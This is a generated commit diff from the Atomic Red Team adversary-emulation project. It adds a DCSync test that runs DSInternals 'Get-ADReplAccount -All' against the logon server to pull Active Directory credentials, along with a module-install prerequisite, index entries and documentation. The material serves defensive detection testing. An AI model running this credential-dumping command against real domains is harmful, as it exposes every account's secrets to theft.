Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
This commit is contained in:
CircleCI Atomic Red Team doc generator
parent
150b02825d
commit
b5c2dc6f78
@@ -30,6 +30,7 @@ credential-access,T1555.003,Credentials from Web Browsers,7,Simulating access to
|
||||
credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
|
||||
credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
|
||||
credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
|
||||
credential-access,T1003.006,DCSync,2,Run DSInternals Get-ADReplAccount,a0bced08-3fc5-4d8b-93b7-e8344739376e,powershell
|
||||
credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
|
||||
credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
|
||||
credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
|
||||
|
||||
|
@@ -17,6 +17,7 @@ credential-access,T1555.003,Credentials from Web Browsers,7,Simulating access to
|
||||
credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
|
||||
credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
|
||||
credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
|
||||
credential-access,T1003.006,DCSync,2,Run DSInternals Get-ADReplAccount,a0bced08-3fc5-4d8b-93b7-e8344739376e,powershell
|
||||
credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
|
||||
credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
|
||||
credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
|
||||
|
||||
|
@@ -46,6 +46,7 @@
|
||||
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
|
||||
- [T1003.006 DCSync](../../T1003.006/T1003.006.md)
|
||||
- Atomic Test #1: DCSync (Active Directory) [windows]
|
||||
- Atomic Test #2: Run DSInternals Get-ADReplAccount [windows]
|
||||
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1187 Forced Authentication](../../T1187/T1187.md)
|
||||
|
||||
@@ -29,6 +29,7 @@
|
||||
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
|
||||
- [T1003.006 DCSync](../../T1003.006/T1003.006.md)
|
||||
- Atomic Test #1: DCSync (Active Directory) [windows]
|
||||
- Atomic Test #2: Run DSInternals Get-ADReplAccount [windows]
|
||||
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1187 Forced Authentication](../../T1187/T1187.md)
|
||||
|
||||
@@ -1808,6 +1808,36 @@ credential-access:
|
||||
"exit"
|
||||
|
||||
'
|
||||
- name: Run DSInternals Get-ADReplAccount
|
||||
auto_generated_guid: a0bced08-3fc5-4d8b-93b7-e8344739376e
|
||||
description: "The following Atomic will run Get-ADReplAccount from DSInternals.\nUpon
|
||||
successful execution, domain and credentials will appear in stdout. \n[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/)
|
||||
CrowdStrike StellerParticle.\nhttps://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/\n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
logonserver:
|
||||
description: ComputerName argument default %logonserver%
|
||||
type: String
|
||||
default: $ENV:logonserver.TrimStart("\")
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: 'DSInternals must be installed
|
||||
|
||||
'
|
||||
prereq_command: |
|
||||
$RequiredModule = Get-Module -Name DSInternals -ListAvailable
|
||||
if (-not $RequiredModule) {exit 1}
|
||||
if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
|
||||
get_prereq_command: 'Install-Module -Name DSInternals -Scope CurrentUser -Force
|
||||
|
||||
'
|
||||
executor:
|
||||
command: 'Get-ADReplAccount -All -Server #{logonserver}
|
||||
|
||||
'
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
T1556.001:
|
||||
technique:
|
||||
external_references:
|
||||
|
||||
@@ -10,6 +10,8 @@ DCSync functionality has been included in the "lsadump" module in [Mimikatz](htt
|
||||
|
||||
- [Atomic Test #1 - DCSync (Active Directory)](#atomic-test-1---dcsync-active-directory)
|
||||
|
||||
- [Atomic Test #2 - Run DSInternals Get-ADReplAccount](#atomic-test-2---run-dsinternals-get-adreplaccount)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -66,4 +68,54 @@ Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #2 - Run DSInternals Get-ADReplAccount
|
||||
The following Atomic will run Get-ADReplAccount from DSInternals.
|
||||
Upon successful execution, domain and credentials will appear in stdout.
|
||||
[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellerParticle.
|
||||
https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** a0bced08-3fc5-4d8b-93b7-e8344739376e
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| logonserver | ComputerName argument default %logonserver% | String | $ENV:logonserver.TrimStart("\")|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`!
|
||||
|
||||
|
||||
```powershell
|
||||
Get-ADReplAccount -All -Server #{logonserver}
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `powershell`!
|
||||
##### Description: DSInternals must be installed
|
||||
##### Check Prereq Commands:
|
||||
```powershell
|
||||
$RequiredModule = Get-Module -Name DSInternals -ListAvailable
|
||||
if (-not $RequiredModule) {exit 1}
|
||||
if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```powershell
|
||||
Install-Module -Name DSInternals -Scope CurrentUser -Force
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
Reference in New Issue
Block a user